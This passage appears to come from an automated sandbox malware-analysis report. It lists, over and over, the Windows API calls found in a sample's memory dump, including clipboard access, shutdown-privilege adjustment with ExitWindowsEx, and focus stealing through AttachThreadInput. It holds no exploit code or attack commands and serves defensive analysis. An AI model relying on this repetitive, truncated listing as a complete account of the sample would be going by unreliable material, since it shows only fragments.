      • Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 00471786
      • Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,004987E9,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 0047179C
      • Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717AC
      • Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717D0
      • Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717E4
      • Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717F4
      • Part of subcall function 00471750: __alldiv.INT64 ref: 00471816
    • GetTickCount.KERNEL32(?,?), ref: 00423FDA
      • Part of subcall function 00423F40: GlobalUnWire.KERNEL32(00000000), ref: 00423FB6
      • Part of subcall function 00423F40: CloseClipboard.USER32 ref: 00423FC2
      • Part of subcall function 00423F40: PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 00424002
      • Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 00424018
      • Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 004240D4
    • GetSystemTimeAsFileTime.KERNEL32(?), ref: 00424F92
    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00424FA8
    • __alldiv.INT64 ref: 00425256
      • Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(00000001), ref: 00401012
      • Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(0000000F), ref: 0040101A
    Memory Dump Source
    • Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
    • Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
    • Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
    • Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
    • Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
    • Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_ss.jbxd
    APIs
      • Part of subcall function 004341C0: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0043423E
      • Part of subcall function 004341C0: AttachThreadInput.USER32(00000E10,00000000,00000001), ref: 00434266
      • Part of subcall function 004341C0: SetFocus.USER32(?), ref: 00434276
      • Part of subcall function 004341C0: AttachThreadInput.USER32(00000E10,00000000,00000000), ref: 004342BD
      • Part of subcall function 00471410: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,?,?,?), ref: 0047142A
      • Part of subcall function 004716A0: FileTimeToLocalFileTime.KERNEL32(?), ref: 004716B4
      • Part of subcall function 004716A0: FileTimeToSystemTime.KERNEL32(?,?), ref: 004716D2
      • Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 00471786
      • Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,004987E9,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 0047179C
      • Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717AC
      • Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717D0
      • Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717E4
      • Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717F4
      • Part of subcall function 00471750: __alldiv.INT64 ref: 00471816
    • GetTickCount.KERNEL32(?,?), ref: 00423FDA
      • Part of subcall function 00423F40: GlobalUnWire.KERNEL32(00000000), ref: 00423FB6
      • Part of subcall function 00423F40: CloseClipboard.USER32 ref: 00423FC2
      • Part of subcall function 00423F40: PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 00424002
      • Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 00424018
      • Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 004240D4
    • GetSystemTimeAsFileTime.KERNEL32(?), ref: 00424F92
    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00424FA8
    • __alldiv.INT64 ref: 00425256
      • Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(00000001), ref: 00401012
      • Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(0000000F), ref: 0040101A
    Memory Dump Source
    • Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
    • Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
    • Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
    • Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
    • Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
    • Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_ss.jbxd
    APIs
      • Part of subcall function 00452610: GetCurrentProcess.KERNEL32(00000028,?), ref: 0045261A
      • Part of subcall function 00452610: OpenProcessToken.ADVAPI32(00000000), ref: 00452621
      • Part of subcall function 00452610: LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 0045263D
      • Part of subcall function 00452610: AdjustTokenPrivileges.ADVAPI32 ref: 00452665
      • Part of subcall function 00452610: GetLastError.KERNEL32 ref: 0045266B
      • Part of subcall function 00452610: ExitWindowsEx.USER32(?,00000000), ref: 0045267B
      • Part of subcall function 00471410: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,?,?,?), ref: 0047142A
      • Part of subcall function 004716A0: FileTimeToLocalFileTime.KERNEL32(?), ref: 004716B4
      • Part of subcall function 004716A0: FileTimeToSystemTime.KERNEL32(?,?), ref: 004716D2
      • Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 00471786
      • Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,004987E9,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 0047179C
      • Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717AC
      • Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717D0
      • Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717E4
      • Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717F4
      • Part of subcall function 00471750: __alldiv.INT64 ref: 00471816
    • GetTickCount.KERNEL32(?,?), ref: 00423FDA
      • Part of subcall function 00423F40: GlobalUnWire.KERNEL32(00000000), ref: 00423FB6
      • Part of subcall function 00423F40: CloseClipboard.USER32 ref: 00423FC2
      • Part of subcall function 00423F40: PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 00424002
      • Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 00424018
      • Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 004240D4
    • GetSystemTimeAsFileTime.KERNEL32(?), ref: 00424F92
    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00424FA8
    • __alldiv.INT64 ref: 00425256
      • Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(00000001), ref: 00401012
      • Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(0000000F), ref: 0040101A
    Memory Dump Source
    • Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
    • Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
    • Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
    • Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
    • Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
    • Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_ss.jbxd
    APIs
      • Part of subcall function 0046E4E0: GetFullPathNameA.KERNEL32(004987E9,00000104,?,?), ref: 0046E4F8
      • Part of subcall function 0046E4E0: WritePrivateProfileStringA.KERNEL32(?,?,00000000,?), ref: 0046E51B
      • Part of subcall function 0046E4E0: WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,?), ref: 0046E52A
      • Part of subcall function 00471410: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,?,?,?), ref: 0047142A
      • Part of subcall function 004716A0: FileTimeToLocalFileTime.KERNEL32(?), ref: 004716B4
      • Part of subcall function 004716A0: FileTimeToSystemTime.KERNEL32(?,?), ref: 004716D2
      • Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 00471786
      • Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,004987E9,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 0047179C
      • Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717AC
      • Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717D0
      • Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717E4
      • Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717F4
      • Part of subcall function 00471750: __alldiv.INT64 ref: 00471816
    • GetTickCount.KERNEL32(?,?), ref: 00423FDA
      • Part of subcall function 00423F40: GlobalUnWire.KERNEL32(00000000), ref: 00423FB6
      • Part of subcall function 00423F40: CloseClipboard.USER32 ref: 00423FC2
      • Part of subcall function 00423F40: PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 00424002
      • Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 00424018
      • Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 004240D4
    • GetSystemTimeAsFileTime.KERNEL32(?), ref: 00424F92
    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00424FA8
    • __alldiv.INT64 ref: 00425256
      • Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(00000001), ref: 00401012
      • Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(0000000F), ref: 0040101A
    Memory Dump Source
    • Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
    • Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
    • Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
    • Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
    • Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
    • Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_ss.jbxd
    APIs
      • Part of subcall function 0043FF90: GetLastError.KERNEL32 ref: 004401BB
      • Part of subcall function 0043FF90: GetLastError.KERNEL32(?,?,?,?,004987E9,00426F58,?,004987E9,004987E9,?), ref: 00440222
      • Part of subcall function 00471410: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,?,?,?), ref: 0047142A
      • Part of subcall function 004716A0: FileTimeToLocalFileTime.KERNEL32(?), ref: 004716B4
      • Part of subcall function 004716A0: FileTimeToSystemTime.KERNEL32(?,?), ref: 004716D2
      • Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 00471786
      • Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,004987E9,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 0047179C
      • Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717AC
      • Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717D0
      • Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717E4
      • Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717F4
      • Part of subcall function 00471750: __alldiv.INT64 ref: 00471816
    • GetTickCount.KERNEL32(?,?), ref: 00423FDA
      • Part of subcall function 00423F40: GlobalUnWire.KERNEL32(00000000), ref: 00423FB6
      • Part of subcall function 00423F40: CloseClipboard.USER32 ref: 00423FC2
      • Part of subcall function 00423F40: PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 00424002
      • Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 00424018
      • Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 004240D4
    • GetSystemTimeAsFileTime.KERNEL32(?), ref: 00424F92
    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00424FA8
    • __alldiv.INT64 ref: 00425256
      • Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(00000001), ref: 00401012
      • Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(0000000F), ref: 0040101A
    Memory Dump Source
    • Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
    • Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
    • Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
    • Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
    • Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
    • Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_ss.jbxd
    APIs
      • Part of subcall function 00471410: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,?,?,?), ref: 0047142A
      • Part of subcall function 004716A0: FileTimeToLocalFileTime.KERNEL32(?), ref: 004716B4
      • Part of subcall function 004716A0: FileTimeToSystemTime.KERNEL32(?,?), ref: 004716D2
      • Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 00471786
      • Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,004987E9,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 0047179C
      • Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717AC
      • Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717D0
      • Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717E4
      • Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717F4
      • Part of subcall function 00471750: __alldiv.INT64 ref: 00471816
    • GetTickCount.KERNEL32(?,?), ref: 00423FDA
      • Part of subcall function 00423F40: GlobalUnWire.KERNEL32(00000000), ref: 00423FB6
      • Part of subcall function 00423F40: CloseClipboard.USER32 ref: 00423FC2
      • Part of subcall function 00423F40: PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 00424002
      • Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 00424018
      • Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 004240D4
    • GetSystemTimeAsFileTime.KERNEL32(?), ref: 00424F92
    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00424FA8
    • __alldiv.INT64 ref: 00425256
      • Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(00000001), ref: 00401012
      • Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(0000000F), ref: 0040101A
      • Part of subcall function 00451810: GetLastError.KERNEL32 ref: 00451850
      • Part of subcall function 00451810: 74791B72.VERSION(00000000,0049A9C0,?,?), ref: 004518D8
      • Part of subcall function 00451810: GetLastError.KERNEL32 ref: 0045195D
    Memory Dump Source
    • Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
    • Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
    • Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
    • Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
    • Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
    • Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_ss.jbxd
    APIs
      • Part of subcall function 00436A20: GetWindowRect.USER32(00000000,?), ref: 00436A7F
      • Part of subcall function 00471410: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,?,?,?), ref: 0047142A
      • Part of subcall function 004716A0: FileTimeToLocalFileTime.KERNEL32(?), ref: 004716B4
      • Part of subcall function 004716A0: FileTimeToSystemTime.KERNEL32(?,?), ref: 004716D2
      • Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 00471786
      • Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,004987E9,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 0047179C
      • Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717AC
      • Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717D0
      • Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717E4
      • Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717F4
      • Part of subcall function 00471750: __alldiv.INT64 ref: 00471816
    • GetTickCount.KERNEL32(?,?), ref: 00423FDA
      • Part of subcall function 00423F40: GlobalUnWire.KERNEL32(00000000), ref: 00423FB6
      • Part of subcall function 00423F40: CloseClipboard.USER32 ref: 00423FC2
      • Part of subcall function 00423F40: PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 00424002
      • Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 00424018
      • Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 004240D4
    • GetSystemTimeAsFileTime.KERNEL32(?), ref: 00424F92
    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00424FA8
    • __alldiv.INT64 ref: 00425256
      • Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(00000001), ref: 00401012
      • Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(0000000F), ref: 0040101A
    Memory Dump Source
    • Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
    • Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
    • Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
    • Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
    • Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
    • Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_ss.jbxd
    APIs
      • Part of subcall function 00434390: SendMessageTimeoutA.USER32(00000000,0000000E,00000000,00000000,00000002,00001388,?), ref: 004343D2
      • Part of subcall function 00471410: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,?,?,?), ref: 0047142A
      • Part of subcall function 004716A0: FileTimeToLocalFileTime.KERNEL32(?), ref: 004716B4
      • Part of subcall function 004716A0: FileTimeToSystemTime.KERNEL32(?,?), ref: 004716D2
      • Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 00471786
      • Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,004987E9,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 0047179C
      • Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717AC
      • Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717D0
      • Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717E4
      • Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717F4
      • Part of subcall function 00471750: __alldiv.INT64 ref: 00471816
    • GetTickCount.KERNEL32(?,?), ref: 00423FDA
      • Part of subcall function 00423F40: GlobalUnWire.KERNEL32(00000000), ref: 00423FB6
      • Part of subcall function 00423F40: CloseClipboard.USER32 ref: 00423FC2
      • Part of subcall function 00423F40: PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 00424002
      • Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 00424018
      • Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 004240D4
    • GetSystemTimeAsFileTime.KERNEL32(?), ref: 00424F92
    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00424FA8
    • __alldiv.INT64 ref: 00425256
      • Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(00000001), ref: 00401012
      • Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(0000000F), ref: 0040101A
    Memory Dump Source
    • Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
    • Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
    • Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
    • Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
    • Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
    • Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_ss.jbxd
    APIs
      • Part of subcall function 0043B350: _strncpy.LIBCMT ref: 0043B36C
      • Part of subcall function 0043B350: __ultow.LIBCMT ref: 0043B458
      • Part of subcall function 0043B350: __ultow.LIBCMT ref: 0043B5BB
      • Part of subcall function 00471410: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,?,?,?), ref: 0047142A
      • Part of subcall function 004716A0: FileTimeToLocalFileTime.KERNEL32(?), ref: 004716B4
      • Part of subcall function 004716A0: FileTimeToSystemTime.KERNEL32(?,?), ref: 004716D2
      • Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 00471786
      • Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,004987E9,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 0047179C
      • Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717AC
      • Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717D0
      • Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717E4
      • Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717F4
      • Part of subcall function 00471750: __alldiv.INT64 ref: 00471816
    • GetTickCount.KERNEL32(?,?), ref: 00423FDA
      • Part of subcall function 00423F40: GlobalUnWire.KERNEL32(00000000), ref: 00423FB6
      • Part of subcall function 00423F40: CloseClipboard.USER32 ref: 00423FC2
      • Part of subcall function 00423F40: PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 00424002
      • Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 00424018
      • Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 004240D4
    • GetSystemTimeAsFileTime.KERNEL32(?), ref: 00424F92
    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00424FA8
    • __alldiv.INT64 ref: 00425256
      • Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(00000001), ref: 00401012
      • Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(0000000F), ref: 0040101A
    Memory Dump Source
    • Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
    • Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
    • Associated: 00000002.00000002.14608589117.004B2000.00000040.sdmp
    • Associated: 00000002.00000002.14608600531.004B6000.00000080.sdmp
    • Associated: 00000002.00000002.14608609224.004B7000.00000008.sdmp
    • Associated: 00000002.00000002.14608621168.004BB000.00000004.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_400000_ss.jbxd
    APIs
      • Part of subcall function 00471410: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,?,?,?), ref: 0047142A
      • Part of subcall function 004716A0: FileTimeToLocalFileTime.KERNEL32(?), ref: 004716B4
      • Part of subcall function 004716A0: FileTimeToSystemTime.KERNEL32(?,?), ref: 004716D2
      • Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 00471786
      • Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,004987E9,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 0047179C
      • Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717AC
      • Part of subcall function 00471750: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717D0
      • Part of subcall function 00471750: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717E4
      • Part of subcall function 00471750: FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,004251FB,004ABB26,?), ref: 004717F4
      • Part of subcall function 00471750: __alldiv.INT64 ref: 00471816
    • GetTickCount.KERNEL32(?,?), ref: 00423FDA
      • Part of subcall function 00423F40: GlobalUnWire.KERNEL32(00000000), ref: 00423FB6
      • Part of subcall function 00423F40: CloseClipboard.USER32 ref: 00423FC2
      • Part of subcall function 00423F40: PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 00424002
      • Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 00424018
      • Part of subcall function 00423F40: GetTickCount.KERNEL32(?,?), ref: 004240D4
    • GetSystemTimeAsFileTime.KERNEL32(?), ref: 00424F92
    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00424FA8
    • __alldiv.INT64 ref: 00425256
      • Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(00000001), ref: 00401012
      • Part of subcall function 00401000: IsClipboardFormatAvailable.USER32(0000000F), ref: 0040101A
    Memory Dump Source
    • Source File: 00000002.00000002.14608399944.00401000.00000040.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000002.00000002.14608391172.00400000.00000002.sdmp
    • Associated: 00000002.00000002.14608569408.004A5000.00000040.sdmp
